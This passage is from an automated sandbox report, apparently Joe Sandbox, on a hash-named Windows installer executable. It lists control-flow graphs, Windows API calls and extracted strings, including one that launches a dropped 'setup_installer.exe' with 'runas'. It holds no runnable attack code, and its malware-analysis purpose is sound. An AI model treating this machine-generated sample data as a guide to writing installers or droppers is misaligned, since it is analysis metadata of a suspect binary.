403d35-403d37 181->184 185 403d39-403d3a call 405e5d 181->185 184->175 184->185 185->175 197 403e51-403e63 GetClassInfoW 189->197 198 403e47-403e4c call 4068c1 189->198 195 403ed0-403ed2 call 40140b 190->195 196 403eb8-403ebe 190->196 195->169 196->177 199 403ec4-403ecb call 40140b 196->199 202 403e65-403e75 GetClassInfoW RegisterClassW 197->202 203 403e7b-403eac DialogBoxParamW call 40140b call 403b5b 197->203 198->197 199->177 202->203 203->173
                                        APIs
                                          • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                          • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000000), ref: 00403C25
                                          • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                        • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
                                        • lstrlenW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,?,?,?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403D0C
                                        • lstrcmpiW.KERNEL32(?,.exe,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,?,?,?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                                        • GetFileAttributesW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00403D2A
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D73
                                        • RegisterClassW.USER32(00429200), ref: 00403DB0
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                                        • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                                        • RegisterClassW.USER32(00429200), ref: 00403E75
                                        • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 606308-919364621
                                        • Opcode ID: 48322becd3d8efe0cd832b317988b4041c355d21bd462e37230b45ba98bd7fc7
                                        • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                                        • Opcode Fuzzy Hash: 48322becd3d8efe0cd832b317988b4041c355d21bd462e37230b45ba98bd7fc7
                                        • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 406c5b-406c60 399 406cd1-406cef 398->399 400 406c62-406c91 398->400 403 4072c7-4072dc 399->403 401 406c93-406c96 400->401 402 406c98-406c9c 400->402 404 406ca8-406cab 401->404 405 406ca4 402->405 406 406c9e-406ca2 402->406 407 4072f6-40730c 403->407 408 4072de-4072f4 403->408 410 406cc9-406ccc 404->410 411 406cad-406cb6 404->411 405->404 406->404 409 40730f-407316 407->409 408->409 415 407318-40731c 409->415 416 40733d-407349 409->416 414 406e9e-406ebc 410->414 412 406cb8 411->412 413 406cbb-406cc7 411->413 412->413 422 406d31-406d5f 413->422 420 406ed4-406ee6 414->420 421 406ebe-406ed2 414->421 417 407322-40733a 415->417 418 4074cb-4074d5 415->418 423 406adf-406ae8 416->423 417->416 424 4074e1-4074f4 418->424 427 406ee9-406ef3 420->427 421->427 425 406d61-406d79 422->425 426 406d7b-406d95 422->426 432 4074f6 423->432 433 406aee 423->433 429 4074f9-4074fd 424->429 428 406d98-406da2 425->428 426->428 430 406ef5 427->430 431 406e96-406e9c 427->431 435 406da8 428->435 436 406d19-406d1f 428->436 448 406e7b-406e93 430->448 449 40747d-407487 430->449 431->414 434 406e3a-406e44 431->434 432->429 438 406af5-406af9 433->438 439 406c35-406c56 433->439 440 406b9a-406b9e 433->440 441 406c0a-406c0e 433->441 444 407489-407493 434->444 445 406e4a-407013 434->445 454 407465-40746f 435->454 455 406cfe-406d16 435->455 446 406dd2-406dd8 436->446 447 406d25-406d2b 436->447 438->424 453 406aff-406b0c 438->453 439->403 451 406ba4-406bbd 440->451 452 40744a-407454 440->452 442 406c14-406c28 441->442 443 407459-407463 441->443 456 406c2b-406c33 442->456 443->424 444->424 445->423 458 406e36 446->458 460 406dda-406df8 446->460 447->422 447->458 448->431 449->424 459 406bc0-406bc4 451->459 452->424 453->432 461 406b12-406b58 453->461 454->424 455->436 456->439 456->441 458->434 459->440 464 406bc6-406bcc 459->464 465 406e10-406e22 460->465 466 406dfa-406e0e 460->466 462 406b80-406b82 461->462 463 406b5a-406b5e 461->463 469 406b90-406b98 462->469 470 406b84-406b8e 462->470 467 406b60-406b63 GlobalFree 463->467 468 406b69-406b77 GlobalAlloc 463->468 471 406bf6-406c08 464->471 472 406bce-406bd5 464->472 473 406e25-406e2f 465->473 466->473 467->468 468->432 474 406b7d 468->474 469->459 470->469 470->470 471->456 475 406be0-406bf0 GlobalAlloc 472->475 476 406bd7-406bda GlobalFree 472->476 473->446 477 406e31 473->477 474->462 475->432 475->471 476->475 479 407471-40747b 477->479 480 406db7-406dcf 477->480 479->424 480->446
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                        • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                                        • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                        • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 210 403068-4030b6 GetTickCount GetModuleFileNameW call 406032 213 4030c2-4030f0 call 40653c call 405e5d call 40653c GetFileSize 210->213 214 4030b8-4030bd 210->214 222 4030f6 213->222 223 4031db-4031e9 call 402fc6 213->223 215 403302-403306 214->215 225 4030fb-403112 222->225 229 4032ba-4032bf 223->229 230 4031ef-4031f2 223->230 227 403114 225->227 228 403116-40311f call 40357a 225->228 227->228 237 403125-40312c 228->237 238 403276-40327e call 402fc6 228->238 229->215 232 4031f4-40320c call 403590 call 40357a 230->232 233 40321e-40326a GlobalAlloc call 406a8c call 406061 CreateFileW 230->233 232->229 261 403212-403218 232->261 259 403280-4032b0 call 403590 call 403309 233->259 260 40326c-403271 233->260 242 4031a8-4031ac 237->242 243 40312e-403142 call 405fed 237->243 238->229 248 4031b6-4031bc 242->248 249 4031ae-4031b5 call 402fc6 242->249 243->248 257 403144-40314b 243->257 250 4031cb-4031d3 248->250 251 4031be-4031c8 call 406a1e 248->251 249->248 250->225 258 4031d9 250->258 251->250 257->248 264 40314d-403154 257->264 258->223 271 4032b5-4032b8 259->271 260->215 261->229 261->233 264->248 266 403156-40315d 264->266 266->248 268 40315f-403166 266->268 268->248 270 403168-403188 268->270 270->229 272 40318e-403192 270->272 271->229 273 4032c1-4032d2 271->273 274 403194-403198 272->274 275 40319a-4031a2 272->275 276 4032d4 273->276 277 4032da-4032df 273->277 274->258 274->275 275->248 279 4031a4-4031a6 275->279 276->277 278 4032e0-4032e6 277->278 278->278 280 4032e8-403300 call 405fed 278->280 279->248 280->215
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 0040307C
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,00000400), ref: 00403098
                                          • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00406036
                                          • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 004030E1
                                        • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 00403223
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$b5$soft
                                        • API String ID: 2803837635-4198545336
                                        • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                        • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                                        • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                        • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 283 40176f-401794 call 402d3e call 405e88 288 401796-40179c call 40653c 283->288 289 40179e-4017b0 call 40653c call 405e11 lstrcatW 283->289 294 4017b5-4017b6 call 4067eb 288->294 289->294 298 4017bb-4017bf 294->298 299 4017c1-4017cb call 40689a 298->299 300 4017f2-4017f5 298->300 307 4017dd-4017ef 299->307 308 4017cd-4017db CompareFileTime 299->308 301 4017f7-4017f8 call 40600d 300->301 302 4017fd-401819 call 406032 300->302 301->302 310 40181b-40181e 302->310 311 40188d-4018b6 call 4055a4 call 403309 302->311 307->300 308->307 312 401820-40185e call 40653c * 2 call 406579 call 40653c call 405ba2 310->312 313 40186f-401879 call 4055a4 310->313 323 4018b8-4018bc 311->323 324 4018be-4018ca SetFileTime 311->324 312->298 345 401864-401865 312->345 325 401882-401888 313->325 323->324 327 4018d0-4018db FindCloseChangeNotification 323->327 324->327 328 402bcb 325->328 331 4018e1-4018e4 327->331 332 402bc2-402bc5 327->332 333 402bcd-402bd1 328->333 335 4018e6-4018f7 call 406579 lstrcatW 331->335 336 4018f9-4018fc call 406579 331->336 332->328 342 401901-40239a call 405ba2 335->342 336->342 342->332 342->333 345->325 347 401867-401868 345->347 347->313
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                        • CompareFileTime.KERNEL32(-00000014,?,runas,runas,00000000,00000000,runas,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                          • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                          • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                          • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$runas$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 1941528284-253172522
                                        • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
                                        • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                                        • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
                                        • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 349 4068c1-4068e1 GetSystemDirectoryW 350 4068e3 349->350 351 4068e5-4068e7 349->351 350->351 352 4068f8-4068fa 351->352 353 4068e9-4068f2 351->353 355 4068fb-40692e wsprintfW LoadLibraryExW 352->355 353->352 354 4068f4-4068f6 353->354 354->355
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                        • wsprintfW.USER32 ref: 00406913
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                        • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                        • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 356 406061-40606d 357 40606e-4060a2 GetTickCount GetTempFileNameW 356->357 358 4060b1-4060b3 357->358 359 4060a4-4060a6 357->359 361 4060ab-4060ae 358->361 359->357 360 4060a8 359->360 360->361
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 0040607F
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
                                        • "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe", xrefs: 00406061
                                        • nsa, xrefs: 0040606E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-105122314
                                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                        • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                        • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 362 403411-403439 GetTickCount 363 403569-403571 call 402fc6 362->363 364 40343f-40346a call 403590 SetFilePointer 362->364 369 403573-403577 363->369 370 40346f-403481 364->370 371 403483 370->371 372 403485-403493 call 40357a 370->372 371->372 375 403499-4034a5 372->375 376 40355b-40355e 372->376 377 4034ab-4034b1 375->377 376->369 378 4034b3-4034b9 377->378 379 4034dc-4034f8 call 406aac 377->379 378->379 380 4034bb-4034db call 402fc6 378->380 385 403564 379->385 386 4034fa-403502 379->386 380->379 387 403566-403567 385->387 388 403504-40350c call 4060e4 386->388 389 403525-40352b 386->389 387->369 392 403511-403513 388->392 389->385 391 40352d-40352f 389->391 391->385 393 403531-403544 391->393 395 403560-403562 392->395 396 403515-403521 392->396 393->370 394 40354a-403559 SetFilePointer 393->394 394->363 395->387 396->377 397 403523 396->397 397->393
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403425
                                          • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                                        • SetFilePointer.KERNELBASE(0035E962,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FilePointer$CountTick
                                        • String ID: b5
                                        • API String ID: 1092082344-1645621157
                                        • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                        • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
                                        • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                        • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 481 403309-403316 482 403334-40333d call 403411 481->482 483 403318-40332e SetFilePointer 481->483 486 403343-403356 call 4060b5 482->486 487 40340b-40340e 482->487 483->482 490 4033fb 486->490 491 40335c-40336f call 403411 486->491 493 4033fd-4033fe 490->493 495 403375-403378 491->495 496 403409 491->496 493->487 497 4033d7-4033dd 495->497 498 40337a-40337d 495->498 496->487 499 4033e2-4033f9 ReadFile 497->499 500 4033df 497->500 498->496 501 403383 498->501 499->490 502 403400-403403 499->502 500->499 503 403388-403392 501->503 502->496 504 403394 503->504 505 403399-4033ab call 4060b5 503->505 504->505 505->490 508 4033ad-4033b4 call 4060e4 505->508 510 4033b9-4033bb 508->510 511 4033d3-4033d5 510->511 512 4033bd-4033cf 510->512 511->493 512->503 513 4033d1 512->513 513->496
                                        APIs
                                        • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID: b5
                                        • API String ID: 973152223-1645621157
                                        • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                        • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
                                        • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                        • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
